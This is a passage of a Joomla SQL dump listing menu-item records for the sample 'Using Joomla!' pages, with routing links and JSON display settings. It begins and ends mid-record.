Component','news-feeds-component','','using-joomla/extensions/components/news-feeds-component','index.php?option=com_content&view=article&id=60','component',1,268,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":1,\"page_title\":\"Newsfeeds Categories View \",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',128,135,0,'*',0),(268,'aboutjoomla','Components','components','','using-joomla/extensions/components','index.php?option=com_content&view=category&layout=blog&id=21','component',1,277,3,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_category_title\":\"\",\"show_description\":\"1\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"0\",\"num_intro_articles\":\"7\",\"num_columns\":\"1\",\"num_links\":\"0\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"order\",\"order_date\":\"\",\"show_pagination\":\"0\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_readmore\":\"\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',93,158,0,'*',0),(270,'aboutjoomla','Contact Component','contact-component','','using-joomla/extensions/components/contact-component','index.php?option=com_content&view=article&id=9','component',1,268,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',110,119,0,'*',0),(271,'aboutjoomla','Users Component','users-component','','using-joomla/extensions/components/users-component','index.php?option=com_content&view=article&id=52','component',1,268,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',136,149,0,'*',0),(272,'aboutjoomla','Article Categories','article-categories','','using-joomla/extensions/components/content-component/article-categories','index.php?option=com_content&view=categories&id=14','component',1,266,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_base_description\":\"\",\"categories_description\":\"\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"display_num\":\"\",\"category_layout\":\"\",\"show_headings\":\"\",\"show_date\":\"\",\"date_format\":\"\",\"filter_field\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',97,98,0,'*',0),(273,'aboutjoomla','Administrator Components','administrator-components','','using-joomla/extensions/components/administrator-components','index.php?option=com_content&view=article&id=1','component',1,268,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',156,157,0,'*',0),(274,'aboutjoomla','Weblinks Single Category','weblinks-single-category','','using-joomla/extensions/components/weblinks-component/weblinks-single-category','index.php?option=com_weblinks&view=category&id=32','component',1,265,5,21,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"display_num\":\"\",\"show_headings\":\"\",\"orderby_pri\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',123,124,0,'*',0),(275,'aboutjoomla','Contact Single Category','contact-single-category','','using-joomla/extensions/components/contact-component/contact-single-category','index.php?option=com_contact&view=category&catid=26&id=36','component',1,270,5,8,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"display_num\":\"20\",\"show_headings\":\"\",\"filter_field\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"presentation_style\":\"sliders\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"1\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',113,114,0,'*',0),(276,'aboutjoomla','Search Components','search-component','','using-joomla/extensions/components/search-component','index.php?option=com_content&view=article&id=39','component',1,268,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',150,155,0,'*',0),(277,'aboutjoomla','Using Extensions','extensions','','using-joomla/extensions','index.php?option=com_content&view=categories&id=20','component',1,280,2,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_base_description\":\"1\",\"categories_description\":\"\",\"maxLevelcat\":\"1\",\"show_empty_categories_cat\":\"1\",\"show_subcat_desc_cat\":\"1\",\"show_cat_num_articles_cat\":\"0\",\"drill_down_layout\":\"0\",\"show_category_title\":\"\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"maxLevel\":\"1\",\"show_empty_categories\":\"1\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_pagination_limit\":\"\",\"filter_field\":\"\",\"show_headings\":\"\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"\",\"list_show_author\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',92,257,0,'*',0),(278,'aboutjoomla','The Joomla! Project','the-joomla-project','','the-joomla-project','index.php?option=com_content&view=article&id=48','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_icons\":\"1\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"0\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',265,266,0,'*',0),(279,'aboutjoomla','The Joomla! Community','the-joomla-community','','the-joomla-community','index.php?option=com_content&view=article&id=47','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"0\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',267,268,0,'*',0),(280,'aboutjoomla','Using Joomla!','using-joomla','','using-joomla','index.php?option=com_content&view=article&id=53','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"1\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',91,262,0,'*',0),(281,'aboutjoomla','Modules','modules','','using-joomla/extensions/modules','index.php?option=com_content&view=category&id=22','component',1,277,3,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_category_title\":\"\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"maxLevel\":\"1\",\"show_empty_categories\":\"1\",\"show_no_articles\":\"0\",\"show_subcat_desc\":\"1\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"\",\"filter_field\":\"\",\"show_headings\":\"\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"\",\"list_show_author\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"\",\"show_readmore\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',159,218,0,'*',0),(282,'aboutjoomla','Templates','templates','','using-joomla/extensions/templates','index.php?option=com_content&view=category&id=23','component',1,277,3,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_category_title\":\"\",\"show_description\":\"1\",\"show_description_image\":\"\",\"maxLevel\":\"2\",\"show_empty_categories\":\"1\",\"show_no_articles\":\"0\",\"show_subcat_desc\":\"1\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"0\",\"filter_field\":\"hide\",\"show_headings\":\"0\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"0\",\"list_show_author\":\"0\",\"show_pagination\":\"0\",\"show_pagination_results\":\"\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"Templates\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',219,238,0,'*',0),(283,'aboutjoomla','Languages','languages','','using-joomla/extensions/languages','index.php?option=com_content&view=category&layout=blog&id=24','component',1,277,3,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"show_category_title\":\"1\",\"show_cat_num_articles\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',239,240,0,'*',0),(284,'aboutjoomla','Plugins','plugins','','using-joomla/extensions/plugins','index.php?option=com_content&view=category&layout=blog&id=25','component',1,277,3,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"1\",\"show_description_image\":\"\",\"show_category_title\":\"1\",\"show_cat_num_articles\":\"\",\"num_leading_articles\":\"0\",\"num_intro_articles\":\"7\",\"num_columns\":\"1\",\"num_links\":\"0\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"order\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',241,256,0,'*',0),(285,'aboutjoomla','Typography Atomic','typography-atomic','','using-joomla/extensions/templates/atomic/typography-atomic','index.php?option=com_content&view=article&id=49','component',1,422,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',233,234,0,'*',0),(290,'mainmenu-degil','Articles','articles','','site-map/articles','index.php?option=com_content&view=categories&id=0','component',0,294,2,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"categories_description\":\"\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"display_num\":\"\",\"category_layout\":\"\",\"show_headings\":\"\",\"show_date\":\"\",\"date_format\":\"\",\"filter_field\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"article-allow_ratings\":\"\",\"article-allow_comments\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',34,35,0,'*',0),(294,'mainmenu-degil','Site Map','site-map','','site-map','index.php?option=com_content&view=article&id=42','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"0\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',33,40,0,'*',0),(300,'aboutjoomla','Latest Users','latest-users','','using-joomla/extensions/modules/user-modules/latest-users','index.php?option=com_content&view=article&id=66','component',1,412,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',183,184,0,'*',0),(301,'aboutjoomla','Who\'s Online','whos-online','','using-joomla/extensions/modules/user-modules/whos-online','index.php?option=com_content&view=article&id=56','component',1,412,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',185,186,0,'*',0),(302,'aboutjoomla','Most Read','most-read','','using-joomla/extensions/modules/content-modules/most-read','index.php?option=com_content&view=article&id=30','component',1,411,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',167,168,0,'*',0),(303,'aboutjoomla','Menu','menu','','using-joomla/extensions/modules/navigation-modules/menu','index.php?option=com_content&view=article&id=29','component',1,415,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',161,162,0,'*',0),(304,'aboutjoomla','Statistics','statistics','','using-joomla/extensions/modules/utility-modules/statistics','index.php?option=com_content&view=article&id=44','component',1,414,5,22,0,'0000-00-00 